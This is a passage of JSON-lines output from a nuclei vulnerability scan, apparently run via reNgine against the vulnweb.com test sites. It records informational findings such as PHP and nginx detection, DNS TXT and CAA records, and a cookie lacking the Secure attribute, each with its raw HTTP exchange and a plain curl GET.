SECTION:\\n;www.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\nwww.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:51.381899149Z\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/cookies-without-secure.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/cookies-without-secure\",\"template-id\":\"cookies-without-secure\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/cookies-without-secure.yaml\",\"info\":{\"name\":\"Cookies without Secure attribute - Detect\",\"author\":[\"vthiery\"],\"tags\":[\"misconfig\",\"http\",\"cookie\",\"generic\"],\"description\":\"Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\\n\",\"impact\":\"Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.\\n\",\"reference\":[\"https://owasp.org/www-community/controls/SecureCookieAttribute\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cvss-metrics\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"},\"remediation\":\"Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.\\n\"},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/logout\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 302 FOUND\\r\\nConnection: close\\r\\nContent-Length: 265\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nLocation: http://testhtml5.vulnweb.com/\\r\\nServer: nginx/1.19.0\\r\\nSet-Cookie: username=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.581899212Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\"},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:48 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.582377027Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true,\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\"},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:48 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.5824239Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:51 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.595537705Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.724314198Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\"},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.724356653Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/php-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/php-detect\",\"template-id\":\"php-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/php-detect.yaml\",\"info\":{\"name\":\"PHP Detect\",\"author\":[\"y0no\"],\"tags\":[\"tech\",\"php\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"vendor\":\"php\",\"product\":\"php\",\"shodan-query\":\"X-Powered-By: PHP\",\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cpe\":\"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\"}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"extracted-results\":[\"5.6.40\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:51.724550172Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:47 GMT\\r\\nLocation: http://testphp.vulnweb.com/Mod_Rewrite_Shop/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.010945269Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 29402\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 29402\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1789\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:52.19135091Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.610222157Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.623136359Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:121.0) Gecko/20100101 Firefox/121.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.626750769Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: 